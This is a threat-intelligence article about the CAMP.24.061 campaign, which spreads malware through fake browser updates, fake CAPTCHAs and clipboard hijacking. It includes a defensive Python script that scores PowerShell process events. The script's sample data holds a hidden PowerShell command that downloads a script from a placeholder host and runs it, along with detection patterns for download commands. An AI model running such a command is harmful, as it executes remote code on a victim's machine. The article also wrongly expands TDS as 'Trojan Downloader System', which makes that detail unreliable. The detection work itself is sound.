Unraveling the CAMP.24.061 Cybercrime Web: A Deep Dive into…

In the ever-evolving landscape of cybersecurity, web browsers have emerged as a prime target for cybercriminals. The recent “CAMP.24.061” campaign, a sophisticated and financially motivated cybercrime operation, exemplifies this growing trend. This article delves into the intricacies of this campaign, its tactics, techniques, and procedures (TTPs), and the broader implications for cybersecurity.

Understanding the CAMP.24.061 Campaign

The “CAMP.24.061” campaign, initially reported by Mandiant and further analyzed by the Menlo Threat Intelligence team, is a complex web of interconnected cybercriminal activities. It involves multiple threat clusters—UNC1543, UNC2926, UNC5142, UNC5518, and UNC4108—all leveraging drive-by downloads and fake browser updates to distribute a wide array of malware payloads.

The Ubiquity of Web Browsers

Web browsers are the gateway to the internet, and their ubiquity makes them an attractive target for cybercriminals. They are used by billions of people worldwide, and their widespread use means that any vulnerability can be exploited on a massive scale. This is why cybercriminals are increasingly focusing on browser-based attacks.

The Financially Motivated Threat Clusters

The threat clusters involved in the “CAMP.24.061” campaign are all financially motivated. This means that their primary goal is to make money, whether through ransomware, ad fraud, or other means. The shared methodologies and overlapping infrastructure underscore a complex, interconnected ecosystem of financially motivated cybercrime.

Infrastructure Overlap and Interconnectedness

One of the key findings of the Menlo Threat Intelligence team is the infrastructure overlap between the various threat clusters involved in the “CAMP.24.061” campaign. This interconnectedness is a clear indication of a complex, coordinated cybercrime operation.

UNC5518 and UNC4108

During threat hunting activities, Menlo identified an infrastructure overlap between UNC5518 and UNC4108 due to their shared use of the IP address 162.33.178.132. This overlap suggests that the two threat clusters are interconnected, either through a shared malicious TDS (Trojan Downloader System) or through direct collaboration.

CAMP.24.061 and CAMP.24.079

The “CAMP.24.061” campaign also overlaps with “CAMP.24.079”. In that campaign, UNC4108 uses a malicious TDS (tracked by Recorded Future as TAG-124) and employs EtherHiding and ClickFix with the same code Menlo observed UNC5518 using. This further underscores the interconnectedness of these cybercrime operations.

Infection Chains and TTPs

The Menlo Threat Intelligence team has observed the IOCs (Indicators of Compromise) associated with the “CAMP.24.061” campaign and has reconstructed infection chains from samples seen in the wild. This section covers those infection chains and the TTPs used by the threat clusters involved.

UNC5518 and UNC4108

Mandiant observed the following infection chain(s) in use by UNC5518 (Feb. 8–14, 2025), which is similar to what Menlo observed. This infection chain involves the use of malicious scripts to fingerprint the victim, execute malicious PowerShell commands, mimic CAPTCHA behavior, and hijack the clipboard.

Deep Dive: Malicious Scripts

The malicious scripts used in the “CAMP.24.061” campaign are highly obfuscated and multi-stage. They include fingerprinting, command execution (PowerShell), fake CAPTCHA behavior, and clipboard hijacking. This section provides a deep dive into the key components of these scripts.

Fingerprinting and Data Collection

The malicious scripts used in the “CAMP.24.061” campaign are designed to fingerprint the victim and collect data. This data is then sent to the cybercriminals’ command-and-control (C2) servers. The scripts use various techniques to evade detection and make it difficult for security tools to analyze them.

Malicious PowerShell Execution

One of the key components of the malicious scripts is the execution of malicious PowerShell commands. These commands are used to download and run remote payloads, which are then used to further compromise the victim’s system. The scripts use various obfuscation techniques to make it difficult for security tools to detect and analyze these commands.

Fake CAPTCHA Behavior

The malicious scripts used in the “CAMP.24.061” campaign are designed to mimic CAPTCHA behavior. This is done to trick the user into interacting with the script, which can then be used to further compromise the victim’s system. The scripts use various obfuscation techniques to make it difficult for security tools to detect and analyze this behavior.

Clipboard Hijacking

Another key component of the malicious scripts is clipboard hijacking. This is done to steal sensitive data from the victim’s system. The scripts use various obfuscation techniques to make it difficult for security tools to detect and analyze this behavior.
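The three stages just described (malicious PowerShell execution, fake CAPTCHA behavior and clipboard hijacking) converge on one observable a defender can score without de-obfuscating the page: the user pastes the hijacked clipboard content into the Run dialog, so explorer.exe spawns a hidden PowerShell that fetches and evaluates a remote script. The following is an added example, not code from the Menlo or Mandiant reports; it uses Sysmon process-creation field names, and the sample events, the placeholder URL and the indicator weights are constructed assumptions.

```python
import re

# Sysmon-style process-creation events, constructed for this example (not real telemetry).
# Event 1 is the post-clipboard stage of the chain described above: explorer.exe (the Run
# dialog) spawns a hidden PowerShell that fetches and evaluates a remote script.
# Event 2 is a routine scripted backup; event 3 is not PowerShell at all.
SAMPLE_EVENTS = [
    {"ProcessId": 4412, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "irm http://verify.example.invalid/c | iex"'},
    {"ProcessId": 5120, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ProcessId": 6001, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
]

# Each indicator alone is common in administration; the combination is what
# distinguishes a pasted ClickFix one-liner, so indicators are scored, not matched singly.
INTERACTIVE_PARENTS = {"explorer.exe", "runtimebroker.exe"}
DOWNLOAD_PRIMITIVES = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"net\.webclient|start-bitstransfer|\bcurl\s)", re.IGNORECASE)
WEIGHTS = {"interactive_parent": 2, "hidden_window": 2, "encoded_or_bypass": 2,
           "download_primitive": 3, "pipe_to_iex": 3}

def score_process_event(event):
    """Return (score, matched indicators) for one process-creation event."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    reasons = []
    if parent in INTERACTIVE_PARENTS:
        reasons.append("interactive_parent")
    if re.search(r"-w(indowstyle)?\s+h(idden)?\b", cmd, re.IGNORECASE):
        reasons.append("hidden_window")
    if re.search(r"-e(nc|ncodedcommand)?\s|-e(p|xecutionpolicy)\s+bypass", cmd, re.IGNORECASE):
        reasons.append("encoded_or_bypass")
    if DOWNLOAD_PRIMITIVES.search(cmd):
        reasons.append("download_primitive")
    if re.search(r"\|\s*(iex|invoke-expression)\b", cmd, re.IGNORECASE):
        reasons.append("pipe_to_iex")
    return sum(WEIGHTS[r] for r in reasons), reasons

def triage(events, threshold=6):
    """Return [(pid, score, reasons)] for events at or above the alert threshold."""
    scored = ((e["ProcessId"], *score_process_event(e)) for e in events)
    return [hit for hit in scored if hit[1] >= threshold]
```

Calibrate the weights and threshold against a baseline of your own administrative PowerShell before alerting on the output.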

HTML and CSS Obfuscation

The malicious scripts used in the “CAMP.24.061” campaign also use HTML and CSS obfuscation to hide malicious UI elements and evade detection by security tools and content filters. This makes it difficult for security tools to detect and analyze the scripts.

Broader Implications for Cybersecurity

The “CAMP.24.061” campaign highlights the growing threat posed by browser-based cybercrime. This campaign is just one example of the many sophisticated and financially motivated cybercrime operations targeting web browsers. The interconnectedness of these operations underscores the need for robust browser security measures and proactive threat intelligence.

The Need for Robust Browser Security Measures

The “CAMP.24.061” campaign highlights the need for robust browser security measures. This includes the use of advanced threat detection and prevention technologies, as well as proactive threat intelligence to stay ahead of emerging threats.

The Importance of Proactive Threat Intelligence

Proactive threat intelligence is essential for defenders in the face of evolving cyber threats. The “CAMP.24.061” campaign is a clear example of the need for organizations to stay informed about emerging threats and to adapt their security measures accordingly.

Conclusion

The “CAMP.24.061” campaign is a complex and sophisticated cybercrime operation targeting web browsers. The interconnectedness of the various threat clusters involved underscores the need for robust browser security measures and proactive threat intelligence. As cybercriminals continue to evolve their tactics and techniques, it is more important than ever for organizations to stay informed and adapt their security measures accordingly.

FAQ

What is the “CAMP.24.061” campaign?

The “CAMP.24.061” campaign is a complex and sophisticated cybercrime operation targeting web browsers. It involves multiple threat clusters—UNC1543, UNC2926, UNC5142, UNC5518, and UNC4108—all leveraging drive-by downloads and fake browser updates to distribute a wide array of malware payloads.

What are the key findings of the Menlo Threat Intelligence team?

The key findings of the Menlo Threat Intelligence team include the infrastructure overlap between the various threat clusters involved in the “CAMP.24.061” campaign and the interconnectedness of these cybercrime operations. This underscores the need for robust browser security measures and proactive threat intelligence.

What are the TTPs used by the threat clusters involved in the “CAMP.24.061” campaign?

The TTPs used by the threat clusters involved in the “CAMP.24.061” campaign include drive-by downloads, fake browser updates, malicious scripts, fingerprinting, command execution (PowerShell), fake CAPTCHA behavior, and clipboard hijacking.

What are the broader implications of the “CAMP.24.061” campaign for cybersecurity?

The “CAMP.24.061” campaign highlights the growing threat posed by browser-based cybercrime. It underscores the need for robust browser security measures and proactive threat intelligence to stay ahead of emerging threats.

What can organizations do to protect themselves against browser-based cybercrime?

Organizations can protect themselves against browser-based cybercrime by using advanced threat detection and prevention technologies, staying informed about emerging threats through proactive threat intelligence, and adapting their security measures accordingly.
